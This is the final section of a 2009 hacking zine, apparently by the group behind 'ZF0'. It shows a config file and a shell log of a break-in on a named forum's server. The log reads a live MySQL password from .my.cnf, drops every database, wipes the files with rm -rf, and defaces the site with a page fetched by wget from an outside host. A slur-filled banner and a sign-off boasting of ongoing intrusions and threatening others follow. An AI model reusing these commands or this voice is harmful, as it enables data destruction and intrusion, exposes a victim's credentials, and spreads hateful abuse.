$INFO['sql_tbl_prefix']			=	'ibf_';
$INFO['sql_debug']			=	'1';
$INFO['board_start']			=	'1182851736';
$INFO['installed']			=	'1';
$INFO['php_ext']			=	'php';
$INFO['safe_mode']			=	'0';
$INFO['board_url']			=	'http://www.blackhat-forums.com';
$INFO['banned_group']			=	'5';
$INFO['admin_group']			=	'4';
$INFO['guest_group']			=	'2';
$INFO['member_group']			=	'3';
$INFO['auth_group']			=	'1';
$INFO['mysql_tbl_type']			=	'MyISAM';
$INFO['upload_dir']			=	'/home/blackhat/public_html/uploads';
$INFO['hb_sql_driver']			=	'mysql';
$INFO['use_friendly_urls']              =       '1';
/*~~DATA~~*/
$VAR = <<<EOF
a%3A4%3A%7Bs%3A12%3A%22install_apps%22%3Bs%3A40%3A%22core%2Cforums%2Cmembers%2Cc
alendar%2Cchat%2Cportal%22%3Bs%3A11%3A%22install_dir%22%3Bs%3A21%3A%22%2Fhome%2F
bhf%2Fpublic_html%22%3Bs%3A11%3A%22install_url%22%3Bs%3A30%3A%22http%3A%2F%2Fwww
.blackhat-forums.com%22%3Bs%3A10%3A%22sql_driver%22%3Bs%3A5%3A%22mysql%22%3B%7D
EOF;
/**/
?>

BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED
BHFOWNEDANDRMED                                                            BHFOWNEDANDRMED
BHFOWNEDANDRMED          TIME TO RM THESE FAGGOTS OFF THE INTERNET         BHFOWNEDANDRMED
BHFOWNEDANDRMED                                                            BHFOWNEDANDRMED
BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED

bhf@blackhat-forums.com [/home/bhf]# cat .my.cnf
[client]
user="bhf"
pass="IxTnA{KU?z/c7(q:"
bhf@blackhat-forums.com [/home/bhf]# echo show databases|mysql -ubhf -p'IxTnA{KU?z/c7(q:'
Database
information_schema
bhf
bhf_aep
bhf_forumipb
bhf_infowarsjoomla
bhf_ratforge
bhf@blackhat-forums.com [/home/bhf]# echo "drop database bhf;drop database bhf_aep;drop da
tabase bhf_forumipb;drop database bhf_infowarsjoomla;drop database bhf_ratforge;"|mysql -u
bhf -p'IxTnA{KU?z/c7(q:'
bhf@blackhat-forums.com [/home/bhf]# echo show databases|mysql -ubhf -p'IxTnA{KU?z/c7(q:'
Database
information_schema
bhf@blackhat-forums.com [/home/bhf]# ls -al
total 180
drwx--x--x  24 bhf  bhf     4096 Jul 15 07:15 ./
drwxr-xr-x 247 root root   12288 Jul 12 18:07 ../
drwx------   3 bhf  bhf     4096 Feb  1  2008 .MirrorSearch/
-rw-------   1 bhf  bhf    12527 Mar 25 11:21 .bash_history
-rw-r--r--   1 bhf  bhf       24 Jun 29  2007 .bash_logout
-rw-r--r--   1 bhf  bhf      215 Mar 24 18:50 .bash_profile
-rw-r--r--   1 bhf  bhf      124 Jun 29  2007 .bashrc
-rw-------   1 bhf  bhf       16 Jun 29  2007 .contactemail
drwxr-xr-x   3 bhf  bhf     4096 Feb  1  2008 .cpaddons/
drwxr-xr-x   5 bhf  bhf     4096 Jun 27 04:07 .cpanel/
-rw-------   1 bhf  bhf       42 Sep 21  2007 .cpanel-logs
drwx------   2 bhf  bhf     4096 Feb  1  2008 .cpcpan/
-rw-r--r--   1 bhf  bhf       19 Jul 15 09:40 .dns
drwx------   2 bhf  bhf     4096 Oct  1  2007 .elinks/
drwxr-xr-x   6 bhf  bhf     4096 Apr  9  2008 .fantasticodata/
-rw-------   1 bhf  bhf       16 Jun 25 22:34 .ftpquota
drwxr-x---   3 bhf  nobody  4096 Feb  1  2008 .htpasswds/
-rw-r--r--   1 bhf  bhf       12 Sep 26  2007 .lang
-rw-------   1 bhf  bhf       14 Jul  1 12:37 .lastlogin
-rw-------   1 bhf  bhf       41 Mar 25 08:39 .lesshst
drwxr-xr-x   2 bhf  bhf     4096 Feb  1  2008 .mc/
-rw-------   1 bhf  bhf       44 Mar 20 20:29 .my.cnf
-rw-r--r--   1 bhf  bhf      509 Jun 30  2007 .pearrc
drwxr-xr-x   3 bhf  bhf     4096 Feb  1  2008 .rvskin/
drwx------   2 bhf  bhf     4096 Jul 14 09:59 .spamassassin/
-rw-r--r--   1 bhf  bhf        0 Oct 31  2007 .spamassassinboxenable
-rw-r--r--   1 bhf  bhf        0 Oct 31  2007 .spamassassinenable
drwx------   2 bhf  bhf     4096 Sep  3  2008 .sqmaildata/
drwx------   2 bhf  bhf     4096 Mar 24 18:33 .ssh/
drwx------   2 bhf  bhf     4096 Sep 22  2007 .trash/
-rw-r--r--   1 bhf  bhf      658 Oct 23  2007 .zshrc
lrwxrwxrwx   1 bhf  bhf       29 Aug 17  2008 access-logs ->/usr/local/apache/domlogs/bhf/
drwxr-xr-x   2 bhf  bhf     4096 Mar 24 17:54 code/
-rw-r-----   1 bhf  bhf        1 Dec 17  2008 cpbackup-exclude.conf
drwxr-x---   3 bhf  mail    4096 Jun 25 07:03 etc/
drwxr-xr-x   2 bhf  bhf     4096 Jan 26  2008 home/
drwx------   2 bhf  bhf     4096 Jul  1 05:09 logs/
drwxrwx---  18 bhf  bhf     4096 Jul 14 22:45 mail/
drwxr-xr-x   3 bhf  bhf     4096 Feb  1  2008 public_ftp/
drwxr-x---  18 bhf  nobody  4096 Jul 15 05:55 public_html/
drwx------   4 bhf  bhf     4096 Feb  1  2008 ssl/
drwxr-xr-x   8 bhf  bhf     4096 Jun 27 04:07 tmp/
lrwxrwxrwx   1 bhf  bhf       11 Aug 17  2008 www -> public_html/
bhf@blackhat-forums.com [/home/bhf]# rm -rf .MirrorSearch/ .bash_history .bash_logout .bas
h_profile .bashrc .contactemail .cpaddons/ .cpanel/ .cpanel-logs .cpcpan/ .dns .elinks/ .f
antasticodata/ .ftpquota .htpasswds/ .lang .lastlogin .lesshst .mc/ .my.cnf .pearrc .rvski
n/ .spamassassin/ .spamassassinboxenable .spamassassinenable .sqmaildata/ .ssh/ .trash/ .z
shrc code/ cpbackup-exclude.conf etc/ home/ logs/ mail/ public_ftp/ ssl/ tmp/
bhf@blackhat-forums.com [/home/bhf]# cd public_html
bhf@blackhat-forums.com [/home/bhf/public_html]# rm -rf *
rm: cannot remove `ptsec.net/aep/sites/default/settings.php': Permission denied
rm: cannot remove directory `ptsec.net/aep/sites/default/files': Permission denied
rm: cannot remove `ptsec.net/aep/sites/default/default.settings.php': Permission denied
bhf@blackhat-forums.com [/home/bhf/public_html]# wget http://romeo.copyandpaste.info/txt/m
ovement.txt -O index.html
--09:44:46--  http://romeo.copyandpaste.info/txt/movement.txt
           => `index.html'
Resolving romeo.copyandpaste.info... 76.175.20.182
Connecting to romeo.copyandpaste.info|76.175.20.182|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,778 (2.7K) [text/plain]

    0K ..                                                    100%   54.62 KB/s

09:44:46 (54.62 KB/s) - `index.html' saved [2778/2778]

bhf@blackhat-forums.com [/home/bhf/public_html]# ls -al
total 20
drwxr-x--- 3 bhf nobody 4096 Jul 15 09:44 ./
drwx--x--x 3 bhf bhf    4096 Jul 15 09:44 ../
-rw-r--r-- 1 bhf bhf     222 Jun 26 05:36 .htaccess
-rw-r--r-- 1 bhf bhf    2778 Jan  7  2007 index.html
drwxr-xr-x 3 bhf bhf    4096 Jul 15 09:44 ptsec.net/
bhf@blackhat-forums.com [/home/bhf/public_html]# cd ..
bhf@blackhat-forums.com [/home/bhf]# ls -al *
lrwxrwxrwx 1 bhf bhf      29 Aug 17  2008 access-logs -> /usr/local/apache/domlogs/bhf/
lrwxrwxrwx 1 bhf bhf      11 Aug 17  2008 www -> public_html/

public_html:
total 20
drwxr-x--- 3 bhf nobody 4096 Jul 15 09:44 ./
drwx--x--x 3 bhf bhf    4096 Jul 15 09:44 ../
-rw-r--r-- 1 bhf bhf     222 Jun 26 05:36 .htaccess
-rw-r--r-- 1 bhf bhf    2778 Jan  7  2007 index.html
drwxr-xr-x 3 bhf bhf    4096 Jul 15 09:44 ptsec.net/




                                           |
                                       \       /            _\/_
    Last Words                           .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
     Stop!                                                          |
       I want to go home
         Take off this uniform and leave the show
           But I'm waiting in this cell because I have to know
             Have I been guilty all this time?

Five isn't a bad number to quit on, is it?

It's been a long time since ZF01. Our owns and releases get better. We would
not consider releasing ZF01 and ZF02 if we were to do it again. Yet doing so
taught us a lot, it threw us out there. We didn't really know what we were
capable of, and we wanted to find out. We were really lucky in how it worked
out, so far.

In the next few months we will do what we did last time. We will chill. Fresh
start. We will have the time to audit some more code and write some code that
we have been meaning to write. Research more hobby projects of ours. That kind
of thing.

Thanks to everyone who sent us mail, there was some great stuff. Sorry we let
the account expire.

The longer we spend on a zine (and the observant reader will notice that the
interim period has grown between each release), the more we are sick of it by
the end. Maybe we will come back, maybe we won't. We can always just hack
silently, join our forefathers in the zine-writers afterlife; that place where
you have already said what you wanted to say, and if you feel like it you just
own and control.

You guys still don't get it. What you see in ZF0 and geist and elsewhere isn't
the end of worldwide ownage, it's the beginning. This is the rule, not the
exception. We don't publish everything, and we publish more hacks than our
cohorts do. We're in every loop. If you aren't keeping your local blackhat rep
informed, you damn well better, or we'll take your spools. 

Shoutz to Ac1dB1tch3z bringing ruquz to '09.


~~~~~~~~~~~~~~~~~~~~~~~~~~ Hope you enjoyed the show ~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~                                                              ~~~~~~~~~
~~~~~~                       Summer isn't over yet                        ~~~~~~
~~~                                                                          ~~~

# milw0rm.com [2009-07-30]